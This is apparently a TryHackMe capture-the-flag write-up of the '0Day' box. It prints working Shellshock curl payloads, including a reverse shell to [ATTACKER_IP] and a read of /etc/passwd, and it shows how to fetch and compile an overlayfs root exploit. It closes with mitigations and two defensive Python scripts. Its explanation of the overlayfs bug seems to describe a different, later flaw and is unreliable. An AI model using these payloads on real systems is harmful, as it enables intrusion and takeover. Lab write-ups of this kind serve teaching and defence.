Box Overview

0Day is a medium-rated TryHackMe box with the description: “Exploit Ubuntu, like a Turtle in a Hurricane”

This writeup covers exploiting the Shellshock vulnerability (CVE-2014-6271) for initial access and leveraging an overlayfs kernel exploit for privilege escalation.

Enumeration

Nmap Scan

Initial port scan reveals two open services:

nmap -sC -sV -oA nmap/initial [TARGET_IP]

Results:

  • Port 22: SSH (OpenSSH)
  • Port 80: HTTP (Apache httpd 2.4.7 Ubuntu)

Web Enumeration

The website displays a single static page with no immediately useful information. Browser inspection tools revealed nothing interesting.

Directory Fuzzing

gobuster dir -u http://[TARGET_IP] -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Interesting discoveries:

  • /backup/ - Contains an RSA private key
  • /secret/ - Directory with “turtle” reference
  • /cgi-bin/ - CGI script directory

Backup Directory

Found an exposed RSA private key at /backup/:

-----BEGIN RSA PRIVATE KEY-----
[Private Key Content]
-----END RSA PRIVATE KEY-----

However, brute-forcing the key wasn’t the intended path (CTFs typically avoid brute-force solutions).

Nikto Scan

nikto -h http://[TARGET_IP]

Key findings:

  • robots.txt present (no useful content)
  • /cgi-bin/test.cgi - CGI script endpoint

Accessing /cgi-bin/test.cgi displays: “Hello World!”

Exploitation - Shellshock

Vulnerability Identification

Reference: HackTricks - CGI Pentesting

Shellshock (CVE-2014-6271) allows attackers to execute arbitrary commands by injecting malicious code into environment variables passed to Bash through CGI scripts.

The vulnerability exists because:

  • Bash parses function definitions stored in environment variables when it starts, before it runs any command
  • Vulnerable versions keep parsing past the closing brace, so a command appended after the function definition is executed
  • Web servers that run CGI scripts through Bash (e.g. older Apache setups with mod_cgi) pass request headers such as User-Agent to the script as environment variables, which lets a remote client supply those variables

Testing for Vulnerability

curl -H "User-Agent: () { :; }; echo vulnerable" http://[TARGET_IP]/cgi-bin/test.cgi

Result: an error response instead of the usual “Hello World!” page, indicating the host is vulnerable to Shellshock! ✅

Information Gathering

Extract system user information:

curl -H "User-Agent: () { :; }; /bin/bash -c 'whoami'" http://[TARGET_IP]/cgi-bin/test.cgi

Output: www-data

Read /etc/passwd:

curl -H "User-Agent: () { :; }; /bin/bash -c 'cat /etc/passwd'" http://[TARGET_IP]/cgi-bin/test.cgi

Discovered user: ryan

Reverse Shell

Setup netcat listener:

nc -lvnp 4444

Execute reverse shell via Shellshock:

curl -H "User-Agent: () { :; }; /bin/bash -c 'bash -i >& /dev/tcp/[ATTACKER_IP]/4444 0>&1'" \
  http://[TARGET_IP]/cgi-bin/test.cgi

Shell obtained as www-data!

User Flag

whoami
# www-data

cat /home/ryan/user.txt
# [user flag]

User flag captured!

Privilege Escalation

System Enumeration

Standard privilege escalation checks:

sudo -l
# No sudo privileges

uname -a
# Linux [hostname] 3.13.0-32-generic #57-Ubuntu

Key finding: Kernel version 3.13.0-32 is vulnerable!

Kernel Exploitation - Overlayfs

Vulnerability: CVE-2015-1328 - Overlayfs Local Privilege Escalation

Exploit: https://www.exploit-db.com/exploits/37292

Locating the Exploit

searchsploit overlayfs
# linux/local/37292.c

Prerequisites Check

Verify required tools are present:

which wget
# /usr/bin/wget

which gcc
# /usr/bin/gcc

Both available! ✅

Exploit Transfer

On attacker machine:

# Copy exploit to working directory
searchsploit -m 37292

# Start HTTP server
python3 -m http.server 8000

On target machine:

wget http://[ATTACKER_IP]:8000/37292.c

Initial Compilation Attempt

gcc 37292.c -o root_exploit

Error: Compilation failed - GCC unable to find cc1

PATH Variable Issue

Problem: the shell’s PATH variable was not the standard Ubuntu configuration, so GCC could not locate its compiler back end, cc1.

Solution: Reset PATH to standard Ubuntu configuration

Reference: Ubuntu PATH Documentation

export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

Successful Compilation

gcc 37292.c -o root_exploit
chmod +x root_exploit

Exploit compiled successfully!

Privilege Escalation Execution

./root_exploit

ROOT SHELL OBTAINED! 🎯

whoami
# root

cat /root/root.txt
# [root flag]

Root flag captured!

Vulnerability Analysis

Shellshock (CVE-2014-6271)

Impact: Remote Code Execution via environment variable injection

Affected: Bash versions prior to 4.3

Mitigation:

  • Update Bash to patched versions
  • Disable CGI if not required
  • Implement Web Application Firewall (WAF) rules
  • Restrict CGI script permissions
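As an added defensive example (not part of the original writeup), the following Python scans Apache combined-format access logs for the "() {" function-definition prefix that the WAF rules above key on, which is the same payload shape used in the curl tests in the Shellshock section. The log lines are constructed, with the documentation range 203.0.113.0/24 standing in for client addresses.

```python
import re

# Apache "combined" log format: host ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# A Shellshock payload starts with an exported function definition, "() {".
# Matching that prefix (with optional whitespace) is the signature most IDS and
# WAF rules use; the injected command follows the closing brace.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')
# Only requests that reach a CGI handler get their headers exported to Bash,
# so hits against CGI paths are the ones most likely to have executed.
CGI_PATH_RE = re.compile(r'/cgi-bin/|\.cgi(\?|\s|$)')

# Constructed sample log (not captured from the box); 203.0.113.0/24 is documentation space.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2024:12:00:01 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 13 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2024:12:00:05 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 500 0 "-" "() { :; }; echo vulnerable"
203.0.113.7 - - [10/Mar/2024:12:00:09 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 500 0 "() { :; }; /bin/bash -c 'whoami'" "curl/7.68.0"
198.51.100.4 - - [10/Mar/2024:12:01:00 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "curl/7.68.0"
""".splitlines()

def parse_line(line):
    """Return the fields of one combined-format line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def shellshock_fields(entry):
    """Names of the client-controlled fields carrying a '() {' function definition."""
    return [f for f in ("agent", "referer", "request") if SHELLSHOCK_RE.search(entry[f])]

def scan(lines):
    """One alert per log line whose client-controlled fields carry a Shellshock payload."""
    alerts = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue                      # skip lines in another format rather than crash
        fields = shellshock_fields(entry)
        if fields:
            alerts.append({
                "host": entry["host"],
                "fields": fields,
                "cgi_target": bool(CGI_PATH_RE.search(entry["request"])),
                "status": int(entry["status"]),
            })
    return alerts
```

Running scan() over a real access log turns the one-off curl test into a repeatable hunt: every alert with cgi_target set deserves a look at what the CGI process did next.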

Overlayfs (CVE-2015-1328)

Technical Details:

The vulnerability results from failing to verify user capabilities when setting file attributes. Specifically:

  • Overlayfs sends attribute data to underlying filesystems via vfs_setxattr()
  • It fails to verify data by calling cap_convert_nscap() first
  • Allows unprivileged users to gain elevated capabilities

Patch: Moved cap_convert_nscap() call into vfs_setxattr() to force verification on every call

Mitigation:

  • Update kernel to version 3.13.0-37 or later
  • Apply security patches regularly
  • Monitor for unusual overlayfs mount operations
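Added example (not from the writeup): a small Python check that parses Ubuntu kernel release strings and compares them numerically against the 3.13.0-37 threshold stated above, as a fleet-wide version of the uname -a check done earlier. The uname line is constructed; the hostname is a placeholder.

```python
import re

# Ubuntu kernel release strings look like "3.13.0-32-generic": the upstream
# major.minor.patch, then the Ubuntu ABI number, then an optional flavour.
KERNEL_RE = re.compile(r'^(\d+)\.(\d+)\.(\d+)-(\d+)(?:-[\w-]+)?$')

# Fix threshold from the writeup's mitigation list: 3.13.0-37 or later.
FIXED_RELEASE = (3, 13, 0, 37)

# Constructed "uname -a" line in the shape shown earlier (hostname is a placeholder).
SAMPLE_UNAME = "Linux [hostname] 3.13.0-32-generic #57-Ubuntu SMP x86_64 GNU/Linux"


def parse_release(release):
    """Return (major, minor, patch, abi) as ints, or None if the string is not Ubuntu-style."""
    m = KERNEL_RE.match(release.strip())
    return tuple(int(x) for x in m.groups()) if m else None


def release_from_uname(uname_a):
    """The kernel release is the third whitespace-separated field of 'uname -a'."""
    parts = uname_a.split()
    return parts[2] if len(parts) >= 3 else None


def needs_overlayfs_patch(release):
    """True if below the fixed 3.13.0 ABI, False if at or above it, None if undecidable.

    Tuples are compared numerically: as strings, "3.13.0-100" would sort
    below "3.13.0-37" and be reported as vulnerable when it is not.
    """
    parsed = parse_release(release)
    if parsed is None or parsed[:3] != FIXED_RELEASE[:3]:
        return None   # other kernel series have their own fix versions; do not guess
    return parsed < FIXED_RELEASE


if __name__ == "__main__":
    rel = release_from_uname(SAMPLE_UNAME)
    print(rel, "needs patch:", needs_overlayfs_patch(rel))
```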

Key Takeaways

Attack Chain

  1. Web Enumeration → Discovered CGI endpoint
  2. Shellshock Testing → Confirmed vulnerability via curl
  3. Remote Code Execution → Obtained reverse shell as www-data
  4. Kernel Version Discovery → Identified outdated kernel (3.13.0-32)
  5. Overlayfs Exploitation → Compiled and executed privilege escalation exploit
  6. Root Access → Full system compromise

Lessons Learned

  • Old CGI implementations are prime targets for Shellshock
  • Always enumerate web directories thoroughly
  • Kernel version information is critical for privilege escalation
  • Environment variables (PATH) can affect exploit compilation
  • Understanding underlying vulnerability mechanisms (overlayfs) enhances exploitation skills

Tools Used

  • nmap
  • gobuster
  • nikto
  • curl
  • searchsploit
  • gcc
  • netcat

Credits

Thanks to @0day for creating this engaging box that demonstrates real-world vulnerabilities in legacy systems!